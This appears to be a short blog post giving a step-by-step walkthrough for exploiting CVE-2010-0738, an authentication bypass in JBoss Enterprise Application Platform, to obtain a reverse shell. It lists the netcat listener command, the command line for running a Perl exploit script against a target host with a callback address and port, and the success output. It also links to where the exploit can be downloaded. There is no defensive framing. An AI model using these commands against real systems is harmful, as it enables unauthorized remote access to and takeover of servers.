CVE: CVE-2010-0738
Remote: Yes
Local: No
Url about the vuln and download of the exploit : http://www.securityfocus.com/bid/39710/info
JBoss Enterprise Application Platform is prone to multiple vulnerabilities, including an information-disclosure issue and multiple authentication-bypass issues. An attacker can exploit these issues to bypass certain security restrictions to obtain sensitive information or gain unauthorized access to the application.
Ok, now lets rock and roll!
1) Open 2 shell's on your backtrack or your pentest machine
2) In the first one you have to prepare your pentest server to receive the connection back from the target machine, so you have to type in this shell : nc -l -p 8000 -vvv
3) Now, in the other shell run the exploit : perl jboss.pl mytargettest.com 8080 172.16.1.79 8000 lnx
If you see this in the exploit shell, it means it worked!
UPLOAD... SUCCESS
EXECUTE
SUCCESS
Now go to your other shell and you should have your reverse shell connected!
Have fun.
No comments:
Post a Comment